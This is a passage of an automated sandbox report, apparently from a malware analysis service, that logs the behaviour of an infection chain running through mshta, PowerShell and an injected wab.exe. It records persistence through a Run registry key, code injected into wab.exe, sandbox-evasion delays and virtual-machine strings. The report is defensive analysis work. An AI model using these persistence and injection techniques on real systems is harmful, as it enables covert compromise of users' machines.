              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00414060 push eax; ret 22_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00414060 push eax; ret 22_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00414039 push ecx; ret 22_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_004164EB push 0000006Ah; retf 22_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00416553 push 0000006Ah; retf 22_2_004165C4
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StraddlersJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StraddlersJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_004047CB
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6342Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3439Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7813
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1748
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3209Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.6 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4324Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 5784Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep count: 7813 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep count: 1748 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2804Thread sleep count: 3209 > 30Jump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 3209 delay: -5Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_22C910F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C96580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,10_2_22C96580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00418981 memset,GetSystemInfo,16_2_00418981
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: mshta.exe, 00000000.00000003.2009239128.0000000002C07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: powershell.exe, 00000001.00000002.2806985847.00000000073F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll G
              Source: svchost.exe, 00000003.00000002.3227073694.0000021BB3E56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3224868475.0000021BAE82B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
